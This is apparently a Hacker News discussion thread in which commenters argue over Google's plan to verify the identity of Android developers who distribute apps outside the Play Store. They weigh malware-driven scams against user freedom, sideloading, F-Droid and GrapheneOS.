This invalidates so many reasons to still use android.
This is crazy, this means 10 years from now only terrorists will distribute software. Unacceptable! How many platforms now allow one to build and distribute a binary?
Only Linux, BSD and other operating systems that are entirely Open Source.
Even Windows has scary warnings now that pop up unless you pay several hundred dollars a year plus you have to go through a completely unreasonable process (that often requires being shipped a physical USB device) just to sign your application.
I think they got emboldened by EU's impotent response to Apple's Digital Markets Act (DMA) violations.
Regardless, this is extremely bad news.
Time to donate to GrapheneOS[1] and alternatives[2]. Or contribute [3].
[1] https://grapheneos.org/donate
[2] https://members.calyxinstitute.org/donate
[3] https://grapheneos.org/hiring
Will GrapheneOS even survive the fact that Google will stop publishing Pixel code and such?
If you maintain it as a hard fork, why not? New phones technical specifications improvements are diminishing last few years anyway. As long as it works, it can last for many years to come. The question is only in the project budget, I think.
Time to move to a dumb phone, I guess. Android is slowly becoming worst of both worlds, none of the privacy features of iOS yet walls of the garden keeps getting higher.
Totally deserved with how pathetically complacent and uncurious our society has become. We had it coming.
Gotta love when the megacorp steps in to "help".
Hmm this is weird. I've recently been considering switch back to Android because of how locked down ios is and it sounds like Google's now gonna do the same thing? Will there be a way to deactivate this?
This was probably the reason Nokia died. Symbian development, already cumbersome and app deployment required some such procedure. I remember there was an joint effort in a china based forum and many of us got a cert and a key for our phones. I was reading Nokia obituaries from its executives and the sorry state of Symbian development and app deployment was not considered as a cause. So here it, is young executives repeating a simplistic and destructive strategy. ibm, xerox, nokia and intel will be very proud.
No so young, but just as short-term and thoughtless.
What about webapps?
This seems equivalent to Notarization on macOS. https://developer.apple.com/documentation/security/notarizin...
And once again our only hope is Elon Musk bringing out a competing smartphone ecosystem that is actually open.
sidenote: xAI just opensource Grok 2.5 and will opensource Grok 3 in 6 months.
My son uses an android phone as a medical device with apps that are either downloaded or compiled. Hopefully this won't touch lineageOs
Welp, I was euphemistically already not a fan of the developer experience for Android, now it's straight dead to me.
No reason to ever touch another day of Kotlin.
Come to think of it, why am I even on Android now as a user?
What's the alternative?
The better alternative? Dunno. An alternative is iPhone and just take some of the benefits that comes with it. It's been a much more closed ecosystem from the start, but it's owned it. Google had a competitive advantage over that but they seem intent on throwing those advantages away with no foreseeable other upsides.
In development, working on completely other problem spaces to mobile development at all. It's not 2012 anymore and there are other noteworthy growth areas to spend time on.
But one think in the short term was tonight I just spent some hours migrating registered accounts away using a Gmail account to Proton.
Dumb phone, Linux on arm, Older devices with custom OS.
Does this break F-Droid?
Would be a tragedy if it did. So many interesting and useful apps there without the obnoxious ads or nagging to upgrade.
I'm entirely on F-Droid, with no Google account and no Play Store. Losing F-Droid would force me off Android.
I'm the same. No Google account since 2012. F-Droid is an amazing community effort and has enabled me to find so many great open source applications.
Same.
One thing that annoys me is that a lot of F-Droid apps are obviously naive ports with overbroad permissions like "can read the entirety of storage", but that's still better than the all-consuming Goo.
Maybe F-Droid can sign all packages themselves? Would google let them do that?
The risk is Google could ban all F-Droid apps in one step, which will happen for sure.
"Can?" Sure.
"Would?" Google has zero incentive to do that.
The are apk's floating around from the Ice Cream Sundae days where the developer went out of business and is no longer on Play Store and this is literally the only way to run the app.
I have a Concept2 rower with the old PM3 monitor which is no longer supported by their ErgData app and the only way to connect my phone to my rower is by sideloading the ancient version of the app that supports it. So that's going to break now?
Why even run Android at that point anymore? iOS devices get security updates for longer and have much less data collection than stock Android.
GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
Now there's also no more sideloading, so what purpose does Android even serve anymore?
>GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
The comment in the thread you linked directly contradicts the claim that "bootloader unlocking will also go away".
Exactly, the only reason to be a weirdo and have android in the first place was because there's so many good apps available outside the play store, if they lock it down just like Apple then what's the point?
> what purpose does an open source OS have against a proprietary one
FOSS means a lot less than it used to in Android.
Can you download, build, and install a basic Android system these days without touching a single piece of closed code? Absolutely. Will it be able to do much without closed binaries? No.
Android isn't GNU/Linux where there's a general ethos of making everything in userland FOSS if at all possible. Rather, it's a free OS that both Google and manufacturers can do anything they want with, including shove a ton of spy and bloatware on it, then make it to where you can't get rid of those things, at least not easily.
The optimism from 15 years ago surrounding FOSS in the mobile space is on its deathbed.
I would argue any amount we can get is still lightyears better than not being able to replace or inspect anything at all on the system.
A phone running just the FOSS parts of Android is not super viable for the average person.
> iOS devices [..] have much less data collection than stock Android
iOS does a tremendous amount of data collection including for the usage of ads as per Apple's privacy policy. All the same types of data that stock Android collects, even.
You may believe Apple is a generally better steward of that data than Google, but using iOS does not reduce the amount of data being hoovered up in any meaningful capacity.
> Now there's also no more sideloading, so what purpose does Android even serve anymore?
I hate this change, but I still prefer Android. iOS is hardly perfect nor does it do everything better...
> Why even run Android at that point anymore? iOS devices get security updates for longer and have much less data collection than stock Android.
Because Google-free AOSP-derived Android distributions are far more versatile, offer far more freedom, impose far fewer restrictions and tend to end up being far less expensive than whatever the fruit factory decides their dedicants have to use today. If Google goes the way of the fruit folks and AOSP no longer offers these freedoms the next step is not to surrender to the Church of Apple but to find a way to evade those restrictions.
One of the reasons I switched to Android was the freedom to make apks for my phone and not dealing with certificates, expiry dates, Google's approval, etc.
This is a depressing change if they follow through with this.
And "in the name of security" doesn't pass the smell test if there is no way to opt out.
So, FairPhone with a new OS then?
Well that sucks. So basically all the money weve had taken from us for our play store apps is now "just" going to be spent on administering the registration details of 800 million chinese developers and 6 billion bot accounts.
Whose smart idea was that.
Remind me why we keep using smart phones? They feel like a noose around our collective necks.
These companies need to be destroyed by antitrust violations. I am so tired of these tech companies abusing their market position. I want the FTC to stop being toothless and useless and just absolutely crush these companies. The amount of disdain I have for these companies can't even be properly expressed.
These companies are in bed with the government, you're not going to be saved by any legislation. Many people on this site supported Google censoring the Covid anti-vax idiots, but it should have made it very clear that Google was working at the behest of the government. They're in bed together; the government gets to do an end-run around the constitution, and Google gets to rely on special government privileges and protection. Win-win.
These corpos are part of the government, more or less, and they simply implement the edict to get rid of privacy. Not only in America. Smartphones have become eyes of the govs, while the Internet - something akin to their neural system. What's more interesting is why the govs feel so paranoidal and insecure recently? What are they afraid of?
The desire for people to keep using their currently working devices just got much bigger, and yet another good reason to root.
The infamous Franklin quote always comes to mind when I see things like this happening. Choose freedom over security while you still can, or you'll soon not even have the freedom to choose.
It's also worth reading Stallman's "Right to Read" again, to see how scarily prescient he was.
Before quickly running to dismiss this move, please at least do your research with regards to the situation in the countries mentioned in the article, especially Singapore and Thailand.
Side-loaded malware has been an epidemic in SE Asia, and there are MILLIONS of dollars stolen (mostly from pensioners!) via side-loaded malware disguised as gambling apps - the local population is particularly suspectible to gambling, especially the older generations that are not so tech-savvy.
It's good they decided to do something about it.
So make it an unlockable feature with a big red warning saying something like: 'If you unlock this feature, your money might be stolen, malware could infiltrate your system. You take full responsibility and acknowledge that you are tech-savvy.'
I'm sure if my grandma saw something like that, she wouldn't click it. This way, people who want to stay in a closed garden are protected, while those who want full control have it. The current implementation seems designed for state interests, not the people's.
It shouldn't be impossible. Not every FOSS developer will want to register, or be mature enough, or may be from sanctioned countries, and so forth.
Private app companies should be and are doing more to protect against malware.
Banking apps in Malaysia are required to include malware detection software [0]. Companies should have better fraud and trust teams to identity and block fraud activities.
The rest of the world shouldn't suffer because a handful of banking companies refuse to offer basic fraud protections for their users.
[0] - https://www.abm.org.my/press-releases/banks-to-enable-malwar...
The requirement per Google's post is rolling out globally though in a couple years. There was nothing stopping per country governments that this may disproportionately affect from requiring this for Play Protect/GMS certified Android devices sold in their region but enforcing it worldwide for such non-AOSP devices I don't find surprising to be controversial.
Brave of you to say this. Yeah, in my humble opinion, agree with you, android and ios devices target the mainstream users more than say a PC or Mac's, and should be more locked down. We can keep PC's and Mac's relative open (although they are getting more secure too, which might be good?), but for devices that truly target the masses, secure them as much as possible (why would typical users like my parent's need to install a remote access server on their phone?).
Yeah, my Dad got hacked only a month ago, through a tech-support phishing phone-call. He uses a windows PC which makes him vulnerable, and the scammers did install tons of evil crap. He really should be using an android or ios tablet, to reduce his chances of being hacked like this. I know these devices are still vulnerable, but they do seem more secure based on how much more locked down they are.
Android is getting more closed and iOS more open, I expect more people dissatisfied from both camps. We’ll have less choice overall as they gravitate towards a common middle ground.
Well, when that happens it is finally goodbye to Android from me. I am switching to iOS that day.
This is what Apple already does, isn't it? Why wouldn't it work for Google too?
Apple requires you to get a developer account with them.
Nowhere does that require you to go and get a DUNS number, which is onerous for a single developer to do without the infrastructure of a company.
Never heard of DUNS. It seems to be a US company *Dun & Bradstreet) that provides business intelligence.
It seems kind of odd to me to rely on some kind of external hidden "credit agency"-style company for this? And why would DUNS want to know about some kid in their basement in Bangledesh making (non-malicious) apps, and why would the kid want Dun & Bradstreet to know about them? It makes no sense at all.
They're trying to control malware. Tying apps that may be malicious to an identity that takes some degree of cost and effort to establish seems sensible in that light.
It's not that the identity prevents malware/abuse, but publishing any malware to the store burns the identity and establishing another is harder than simply coming up with a new email address. It's not necessarily the best scheme out of there, but it makes sense given their apparent goal.
I've had a business get listed on DUNS; once you're on it, they resell your data forever.
It’s not just Apple, lots of federal programs in US require a DUNS number.
To be clear, Apple does not require a DUNS number for developer registration.
It does if you have an org account: https://developer.apple.com/programs/enroll/
Yeah, basically this is the rise of computer-credit agencies.
Youc an see the zeitgeist forming around corporations wanting to lock out any small unlicensed company from working on phones.
The key is mostly fascism in the guise of "security". Witness stuff like the ICE tracker app. Google would love a way to freeze out both it's appearance on the app store and any developer who'd program similar.
FWIW I got a DUNS number through apple as a single developer for a corp. It was super easy. If you've already gone through the trouble of setting up a corp, getting the DUNS is trivial by comparison.
Yes. You gotta pay your 100 bucks, but I don't remember feeling like my privacy was being invaded when getting a developer account. I assume the best reason they have for this is that they can nuke the account, effectively killing the install base of an app is reported to be malicious. Unless someone tells me why I should, I don't have a huge issue with this.
While the linked article notes that organizations require a DUNS number seemingly as an aside, personal accounts do not.
Which is exactly the same policy as Apple.
For me the difference is that Android is an open-source operating system. It sold itself and differentiated itself to users, developers and phone manufacturers as an open ecosystem built on open-source foundations.
Over the years, it seems Google has been trying to have their cake and eat it too, by basically subsuming others to use Android through this appeal of a more free and open operating system ecosystem, but have tried to slowly close and close it down now that it has won the other half of the market on that promise.
This feels more sly, because it's kind of a bait and switch. Apple never made such claim and was always upfront, so while I don't like it, I never bought into it in the first place for them to have the rug pulled under me after giving them my money as Google might be doing.
> For me the difference is that Android is an open-source operating system
Google Play is not open source. You're still free to sideload on phone that use vanilla open-source android like the Fairphone.
Most Android apps are crapware anyways. The only respectful apps that I know are open-source, and are being kicked out the of play store progressively.
I'm cancelling my Pixel 10 preorder.
I saw this coming a mile away. Everyone said you could install whatever you wanted on Android, but you were always jumping through some crazy hoops to do so. (compared to a general propose computer)
I see how this is developing. First going more or less close source and then reeling in the freedom - they are not going so much Microsoft but Apple.
Will this affect GrapheneOS users who have Play Protect / Services disabled? Wondering how they intend to do the verification.
This would affect a lot apps that are not on the Play Store for multiple reasons... and if I'm going to be stuck with what Google thinks I should be allowed to use, then why not use iOS instead? At least software updates would be better and the overall experience more polished.
Maybe we need phone sized open source computers.
The only saving grace is you can always import a Chinese phone without the play store at all, and then you can install what you want.
One step closer to The Right to Read: https://www.gnu.org/philosophy/right-to-read.html
Will this be what finally leads to the success of a fully open-source Android fork such as CalyxOS or GrapheneOS?
CalyxOS is already dead. GrapheneOS is the only hope.
https://calyxos.org/news/2025/08/01/a-letter-to-our-communit...
Are there any competing phone OS'es still around? Maybe there is something in China I dont have a view on?
https://en.wikipedia.org/wiki/HarmonyOS
It does have an Android subsystem stuck on, but it's not necessary.
https://puri.sm/products/
We really need a third alternative when it comes to mobile
This is a dangerous thing to do! This severely limits the freedom of the internet. At this point, we'd need a new "OS" like dhh did with Omarchy!
Can Google do something like this for entities wishing to advertise on their platform?
It feels as if that would provide far more of a public service than this... whatever this is.
Are there stats on whether more malware and financial scams come from installed apps or from advertising?
"A recent analysis by the company found that there are “over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.”
Ok, but what's the real damage? In other words, how many installs and how much money siphoned from users and legit apps?
terrible news. i dont like it a bit. wth are they doing? i know all they care about is money but this is bad for everyone.
Apple and Google are now competing on being more closed, rather than on being more open. Perhaps because we gave Apple a free pass on curbing our freedoms, and even defended its actions as needed for 'security'
Stallman warned us.
https://www.gnu.org/philosophy/right-to-read.en.html
He was unable to suggest any pragmatic alternatives. He just said "I don't own a smartphone", ignoring the fact that many people become very disadvantaged without one.
The real heroes are the people that facilitate alternatives, not those who talk.
Stallman is probably in the top 10 of all time in terms of people who facilitated alternatives to this. He invented the GPL and wrote and maintained a ton of tools for people running alternative software stacks to use. What more would you ask for?
No, you're right. He deserves more credits than that. But still, the idea that you can just expect people to not use a smartphone is wrong.
I've edited my post to not claim that all Stallman did was talk, which would've been wrong.
> He just said "I don't own a smartphone", ignoring the fact that many people become very disadvantaged without one.
I know quite some people who live this way, and are very willing to overcome inconvenient hurdles to avoid having to use such a spying device.
>I know quite some people who live this way, and are very willing to overcome inconvenient hurdles to avoid having to use such a spying device.
This is kind of a lazy approach, and it's a good thing Stallman did not have that attitude towards personal computers.
But it's a bummer that there's no real equivalent for mobile devices. I use an Android device and I already consider it to be more locked down than Windows. Generally more irritating than Windows as well (maybe not Windows 11)
I also use it as little as possible (unfortunately more and more things require it) and try to get the smallest functional (for me) Android devices.
There are alternatives, using them involves sacrifices though, and there the modem baseband isn't replaceable yet. Take a look at GrapheneOS, F-Droid, Replicant, Purism Librem, PinePhone, PostmarketOS, PureOS, Mobian etc.
https://wiki.debian.org/Mobile
Okay, let's say you just became an enlightened person who understands that the current state of things need to be fixed.
To actually free yourself requires both commitment on your end and work on other people's end, those people who help facilitate alternatives and guide others to having more freedom and privacy. We need more of that work.
The speakers of the world have their place, of course, but that's not the most important part of the solution.
> To actually free yourself requires both commitment on your end and work on other people's end, those people who help facilitate alternatives and guide others to having more freedom and privacy. We need more of that work.
Such people both lead by example, and try to inspire others towards following their example/lifestyle. The problem rather is that most people want a different lifestyle (in the particular example of privacy and freedom "one with less radical consequences", which I consider to be rather contradictory, but this discussion shall be off topic).
To give an analogue: many vegetarians both lead by example, and inspire others to become vegetarians. But many people nevertheless don't want to become vegetarians.
> The real heroes are the people that facilitate alternatives, not those who talk, and Stallman was of the talking variety.
Like GNU?
Guess I'm getting an iPhone. If both are locked down, I may as well have the one that has a decent watch.
When I switched from Android to iOS, this was one of the things I missed a lot: the ability to write my own app and side load it on my phone. Even more so with the advent of LLM. Oh well, now I don't have to worry about that.
The problem here is that the EU, which would normally be the only hope to put a stop to bullshit like this, seems to like this.
Governments are scurred the internet has made everyone realize their governments are crap, their history is gibberish, and it's all being used to screw the next generation. So 60+ year olds are falling back on old tropes
https://www.bbc.com/news/magazine-26328105
https://en.wikipedia.org/wiki/Parents_Music_Resource_Center
https://en.wikipedia.org/wiki/Seduction_of_the_Innocent
https://www.nytimes.com/1997/02/27/business/job-insecurity-o...
Yanking the leash of the proletariat
TikTok is "brain rot" even though the real economy runs on physical statistics, the semantics have to be recognizable to the elders, or it's not democratic so they will force the semantics to be regurgitated as-if they are religious catechism.
The Internet is the most powerful propaganda distributing system that humanity has ever come up with. Autocracies love the Internet, or at least the ones that see the writing on the wall. We have the sum total knowledge of the entire human race within a few clicks and we mostly use it to find videos to be mad at. We are our own jailors.
It's easy. For the average user, device integrity is more valuable (by a lot) than side loading.
People that think this is unacceptable are not remotely average users. Average users benefit greatly from their pocket appliance not being a full fledged computer.
Ultimate control over devices you own should be a basic right. Apple's wanton abuse of users and developers via the control they have over their platform, and Google's nipping at their heels, should be evidence enough of that.
Fundamentally, it is a trust issue. Why should I be forced to trust Google or Apple has my best interests in mind (they don't)? That is not ensuring 'device integrity', it's ensuring that I am at the whims of a corporation which doesn't care about me and will leverage what it can to extract as much blood as it can from me. You can ensure 'device integrity' without putting any permanent trust in Google or Apple.
Why should I be forced to trust Google or Apple.
You are not.
It's certainly convenient in this modern world to pay for and use one of their devices though.
That was intended to be a generic 'device manufacturer', not calling out Google and Apple specifically. It's my device. I should control it, full stop. It should simply not be legal for a device manufacturer to lock me out of a device I own, post sale. In the past it wasn't _possible_, so we didn't need to worry about it. But now the tech is at the point where manufacturers can create digital locks which simply cannot be broken, and give them full control of devices they sell (ie. which they no longer own), which are being used in anti-consumer ways.
Considering market forces are against it, I believe the only practical way to accomplish this in the long term is for this to be a right that is enforced by legislation. I don't think it is even far from precedent surrounding first sale doctrine and things like Magnuson-Moss, that the user should be the ultimate one in control post-purchase, it just takes a different shape when we're talking about computing technology.
It's my device. I should control it, full stop.
No one is forcing you to buy a particular device.
You are forced to trust Google or Apple if you want a smartphone. They own the whole market, it's a duopoly. You already have no power to install an OS without such limitations on most smartphones.
Limitations because it's not just protection - you don't get to choose which authorities you trust. Defaulting to manufacturer/OS vendor as the default authority would be ok, but there is no option to choose. Users have no power over their own device. That's not ok even if most choose to never execute it or don't know about it, it will lead to abuse of power.
Modern life without either of these OS (or like a phone number) is pretty difficult, i.e. you can't charge your car or access e-government without an app.
Time to support open source mobile OS's then.
I’m willing to sacrifice your rights if it means that there’s less incentive to steal my phone
why do you think you have any say over others' rights? using that same logic, you know what? i think you're going to steal my phone. so do you mind if i sacrifice your rights and install a camera right in your room? wouldn't want you to plot the theft of my phone now would i
Id argue that the average user is not a good barometer. They are okay with slowly being boiled alive. See windows 11 as a good example.
What's being sacrificed in the name of security is not worth it imo.
Enabling side loading on android is not a standard setting you can flick on. Is there any data on the number of devices who have this enabled and are falling for hacked apps?
I might partially agree, but the market already has a fantastic, secure option for those users: Apple.
Android's value was always in being the open(ish) alternative. When we lose that choice and the whole world adopts one philosophy, the ecosystem becomes brittle.
We saw this with the Bell monopoly, which held up telephone innovation for three quarters of a century.
In the short term, some users are safer. In the medium term, all users suffer from the lack of competition and innovation that a duopoly of walled gardens will create.
They're happy in their walled garden, until they don't and discover there is a wall they now can't overcome and learn whose hardware it really is
I do think it is in everyone's interest to be able to run software of your choosing on hardware you bought to own. The manufacturer needn't make it easy (my microwave sure didn't expect to install extra software packages; I don't expect them to open up an interface for this) but they also don't need to actively block the device owner from doing it
> Average users benefit greatly from their pocket appliance not being a full fledged computer.
In what way? Seriously, what benefit is there? (And don't say security...)
Not having social media?
The world would be a much better place if we only had calls and direct messages.
Bro, you forbade exactly the reason this is good for average users. Average users get emails that say:
> you have been infected by 3 viruses, click here in the next 5 minutes or the damage will be permanent
And they believe it. Giving them the power to run any software they want, also means giving everyone else the power to make them run any software they can be tricked into installing.
I'm deeply concerned about how this will impact users like us, especially since we're such a small minority that our desires could easily be trampled by the masses, but this is a clear win for the average user.
(And don't make the perfectionist fallacy w.r.t. Google not successfully preventing 100% of malware)
> this is a clear win for the average user.
In the short term, yes. In the long term, it means Google can ban any app it doesn't like, and it means governments can compel it to do so.
Governments being able to ban software without easy workarounds could have far-reaching consequences affecting people who don't even use the software in question. This is a Bad Thing even if it helps keep a few people from getting scammed.
Damn we should just give up on this whole computer thing outright then, seems pretty dangerous. There are plenty of other things we could strip away that would make people much safer than just installing software, that's thinking small!
Stripping away computers entirely would have significant negative impacts. For the *average user*, preventing them from side-loading unsigned apps will have no negative impact.
For now, maybe. Like all discussions on freedoms and rights it's usually not about the day to day impact or the average person, if we optimized for the average person, we'd be in a sorry state.
> And they believe it.
Two reasons: they are not educated about devices they use, desktop operating systems are still awful at security (exe from a mail attachment can have a pdf looking thumbnail, executed with two clicks, even if accidental, immediately gets access to all user files... the whole concept of antivirus software...). It has nothing to do with side loading, especially on Android, where sideloading is a very explicit action already, and then you need to allow the application to do harm.
> Giving them the power to run any software they want, also means giving everyone else the power to make them run any software they can be tricked into installing.
You are taking away people's agency. Either you get to control your bank account risking that you get scammed, or someone will control it for you.
> very explicit action already, and then you need to allow the application to do harm.
So the email they get which tells them about the 3 viruses also contains a phone number where a "nice tech support person" will walk them through the steps of side-loading the "anti-virus app". You'd be surprised at what warnings/permission boxes people will blindly accept when they think they're talking to someone from Microsoft or Google's tech support.
> You are taking away people's agency.
Agency they don't want and never use. It's taking away agency from people like us but for the average user, Google is taking away nothing they've ever cared about.
> Either you get to control your bank account risking that you get scammed, or someone will control it for you.
I was just saying a couple of days ago that we need a service for old people where any transaction above a certain configurable threshold (for example, $500 in a day) has to be approved by an employee of this service who serves as a neutral 3rd party whose sole function is to try to prevent scams. That way the old folks would still have their agency so they can go out and buy all the hot-rods and transistor radios they want but if they're about to wire money to "Microsoft" then the anti-scam-company would step in and prevent that transaction (or at least require the old person have a discussion about why its an obvious scam first before eventually allowing the transaction through depending on the client).
Whether this change actually takes control away from us remains to be seen. For example, I don't see anything in the article that suggests we wouldn't be able to install a custom ROM with the signature check removed. Personally, I already run GrapheneOS so I expect I actually won't be impacted by this at all.
> For the average user, device integrity is more valuable (by a lot) than side loading.
Right until their devices start to act against their will.
The device integrity is are talking about it integral only to Google and Apple. Not to you.
Agreed. Most people don't care that they can't run "unauthorized app XYZ", as long as their bank account / vacation pics / texts don't leak.
Now, that may happen anyway, but they'll give up a TON to avoid that.
Me, I try to avoid using my phone for anything important, use a VPN under Linux at home whenever possible, ad blockers, privacy guard, etc, etc. I can't expect my non-technical family members to do that.
Bad car analogy coming up: MOST drivers benefit more from ABS than the few really, really good race car drivers who can do threshold braking and outbrake ABS - and even then, I doubt it's true for anything but the earliest ABS systems. I'll bet the newest ABS systems are better than almost any human - because they don't have an off day, don't get distracted, etc.
And I get the anger - I'm an old school Atari 800xl / ST / DOS / Linux user who tries to ditch Windows where possible. Restricting things seems heavy-handed - and I don't trust Google in the least. But I would NEVER tell anyone in my family to sideload an app, even though they're all Android users - I don't want that support burden.
But this is not about device integrity.
I'm all for code signing and integrity verification. We need both technologies on pretty much all devices.
You are just conflating two different issues - side loading has nothing to do with device integrity.
Then they should go buy a boomerphone that can make calls and text and nothing else and stop screwing things up for the rest of us.
Average users also benefit from restricting their ability to purchase alcohol or tobacco, but I don’t see anyone suggesting that…
And people who are financially interested in letting users side-load apps (malicious or otherwise) are good at what they do. I mean, even Russian banks that are banned from the Apple App Store are still finding ways to distribute iPhone apps.
Most users are oblivious around those issues, how can they possibly make an informed choice here?
> Average users benefit greatly from their pocket appliance not being a full fledged computer.
Why, though?
There's certainly no technical reason that a pocket appliance can't be a full fledged computer. The primary reason it isn't is because device manufacturers benefit greatly from having a tight control over their products. This is not unique to mobile devices; we see the same trend of desktop operating systems becoming increasingly user hostile as well.
The claim that these features are in the best interest of users is an inane excuse. Operating systems can certainly give users the freedom to use their devices to their full capabilities, without sacrificing their security or privacy. There are many ways that Google could implement this that doesn't involve being the global authority over which apps users are allowed to install. But, of course, they are in the advertising business, where all data that can be collected, must be collected.
Don't pretend that average users are asked, or that their opinions would matter. Or even that you have some sort of insight into the average user that other people don't have.
People who think this is unacceptable are the people who 1) understand what it is, 2) don't stand to profit from it, and 3) don't dream about locking average users into an ecosystem that they control some day.
You say this as if the widespread embrace of Apple/locked down Android phones is meaningless, fully a bamboozle with no user choice reflected at all.
The EU is some kind of Jekyll and Hyde entity, you can never be sure which way it will go next.
EU loves regulation. And it's much easier to regulate things when there are a few large providers that can be mandated to enforce your laws.
Remind me again why we can't use HTTPS certificates to sign code that is linked with a domain?
Time for Linux phones with Android emulation
This seems like the only sensible long-term solution to me unless anyone else has an alternative. AOSP public access is already on the chopping block, custom ROMs are the short term solution but still operate at Google's whim under the hood.
How does this affect installing an APK to an offline device?
Will there be a local override?
"Monopolies" gonna monopolize, all for our safety, of course
It seems that it was only about time… it just feels like the pace of enshittification with big tech being able to get away with anything is crazy!
I’m hoping that projects like Precursor can take off because we’ve buried ourselves in such mountain of complexity that seems like only a billion/trillion dollar big tech company can make an OS.
But then again, some body called BS on browsers and we might have a good option soon in Ladybug!
https://www.crowdsupply.com/sutajio-kosagi/precursor
I rely on an open source app called xDrip to manage my diabetes. It's way way way better than any of the official apps. It's not distributed on the app stores for obvious reasons. Many others rely on this app as well. Are we cooked?
>However, developers who appreciated the anonymity of alternative distribution methods will no longer have that option.
Don't be evil Google!
So that's how they kill newpipe.
They want to stop adblocking YouTube apps
So Google won't even offer a system toggle to let users install an app they've made or copied?
Google don't even expose a per-app toggle for app Internet access, why am I surprised?
This is disgusting.
Freedom died a little bit more today.
Why is end-user choice and consent not considered?
It's really disturbing that the EU and Google would do this.
I can't recommend Android or iPhone because of this nonsense.
> Why is end-user choice and consent not considered?
The elimination of user choice was very much considered. In fact, it's the primary goal.
Our only choice are 2 american companies, Google or Apple
Why did we let that happen?
With more and more things like this, we need to back to making native apps on desktops and laptops where we as the users are in control.
Anyone else remembers “don’t be evil”?
GrapheneOS.
wow that rather fast [https://ibb.co.com/8LF8qdxm]
I already got popup in dashboard this morning
I'm waiting for this with chromium too. Microsoft Edge most removed uBlock Origin on me today.
https://www.gnu.org/philosophy/right-to-read.en.html
It is funny how true this becomes with passing day.
This eliminates the appeal of andoid over ios.
I'm curious what is going to happen to all those Chinese ROMs and third-party Chinese app stores.
China will push own Android OS forks into other markets even harder, if they do it fully open-source then bonus for them, users will force devs (banking apps etc) to get more support. A good example is one EU bank which publishes to Huawei's AppGallery to support non-Google certified Android phones.
This means that for example I will not be able to side load Popcorn Time for Android [1] anymore?
[1] https://github.com/popcorn-official/popcorn-android
The day this happens is the day I stop using "certified Android devices."
You know how folks in the UK are cutting the surveillance cameras, what is the equivalent here?
making an ADB-based debloater and browser shims to use stuff like bank apps, then sharing that with others. Then again, like cutting wires, it doesn't address the root cause.
Not updating Android I guess
"Google to prevent users from installing programs on Android phones."
This might do more good than harm, since I'm willing to believe that scams involving APKs are prevalent, but come on. I need your permission to install software on my phone? Are you sure it isn't just that you want more control over everyone's phones?
Everybody complaining of this is admitting they are doing nefarious actions. Those of us playing by the rules see no issue with this - In fact I welcome it!
Great. I suspect this will push more developers to publish web apps.
Yeah if this goes ahead I'm going back to my feature phone
I see... I guess it's just... web apps then?
Tech like f-droid will be important for the future of free Android
Well I guess that's good bye Pixel and Android for me then.
Maybe its time to stop using an OS developed by an advertising company.
(Responding to https://techcrunch.com/2025/08/25/google-will-require-develo... )
> Starting next year, Google will begin to verify the identities of developers distributing their apps on Android devices, not just those who distribute via the Play Store.
Odd little phrase, "distributing their apps on Android devices".
I think "distributing" in this context is in the sense of product distribution, not in the sense of distributed systems.
But "distributing...on" sounds a little odd, like Google is still providing a distribution service. (Contrary to all the precedent of how we've thought of installing software, other than the proprietary, captive-user app stores.)
And so, maybe "distributing...on" makes it sound more like Google is (once again) entitled to gatekeep what you can run on your device/computer.
> However, developers who appreciated the anonymity of alternative distribution methods will no longer have that option. Google says this will help to cut down on bad actors who hide their identity to distribute malware, commit financial fraud, or steal users’ personal data.
Maybe it's not "developers who appreciated the anonymity" (which we immediately try to conflate with bad actors), but that the whole point lately has been to stop the greedy proprietary lock-in app store monopolies, and not have them gatekeeping what everyone else can do.
"Distribute on" sounds odd because it's incorrect. APKs are not distributed by putting them on phones and carrying the phones from one place to another. "Distribute to" would be more correct; better yet, "develop for".
This is the final nail in the coffin for personal computing
It's a blow, but this is over dramatic.
This aligns with their AOSP recent changes.
This is another "beginning of the end." All eyes are on this situation and how much push back it gets. If there is little resistance, others will certainly follow suit.
How will this affect GrapheneOS?
Google welcome to Apple 10 years ago
Another instalment of HN thread where people try their best to pretend that "security" does not come with "enforced, ideally at hardware level, inability to run random code" for 99% of phone users.
Here a tip: you won't solve the problem of security by just whining about corporate interests (which is a real concern) and NOT proposing a better solution that works for an average tech illiterate, very socially engineerable person trained to ignore every warning screen. And no root switch is not that solution because it will be flipped on day 1.
This doesn't seem to be going over well.
Only developers care. The users don't even know what sideloading is. This will successfully kill off the single remaining freedom users have.
This is actually good if it hopefully paves way for breaking them up
Imagine you develop a VPN app that specifically helps people evade government censorship.
Everyone can figure out what's going to happen next.
> Google is explicit today about how “developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer.”
« Développer will have freedom » yet they are entitled to Google’s verification.
It’s just another stone in the grave of Android and even though I shipped off this sinking ship 6 years ago to iOS, this is still concerning because ultimately apple’s IOS is in competition solely with Android.
If Android gets so bad it has all the disadvantage of iOS, some more, for instance with the embedded spyware that manufacturer are paid to include, and none of the good side of iOS, then everyone lose. Apple doesn’t have to compete anymore, they just have to not suck.
Can you even compile an iOS app without registering with apple?
Without an apple ID you can compile an iOS app, but can only run it in an iPhone Simulator on a Mac.
With a free apple ID (no additional registration needed) you can also install your compiled iOS app on your iPhone and have it working for 7 days before you need to re-install it.
Is it really different from what Google is doing ? Not being to compile or user not being to install have the very same consequence : your app can’t be used.
This will be just another boost for de-googled phones, alternative platforms and potentially Mobile Linux.
The only reason why google phones became so popular was the fact that they were much less restrictive than iPhones. Thus the platform became the biggest phone platform in the world.
Now they are asking for a new start to arise and take their place.
Sorry, folks, the good times are over. The future of computing is a signed, attested chain of trust from boot firmware through application code, on all platforms people are likely to use -- and remote attestation with user identification if you wish to connect to the network. End users love it because it prevents or reduces all sorts of malicious activity, from bank fraud down to online game cheating, with little to no effort on their part; platform vendors love it because it provides a moat; service providers (banks and such) love it for the assurance that their clients are uncompromised; and governments love it because it lets them surveil users and developers.
The only ones who hate it are devs. And who really cares about a bunch of nerds?
Remember, general purpose computing really boils down in security terms to "arbitrary code execution" -- a bad thing in the infosec field.
If this goes through, would it be possible to see a consumer class-action lawsuit? I imagine there is a class of people for whom the sideloading of apps is necessary and removing it renders their phone almost useless. I'd also guess that this market is much larger than Google imagines.
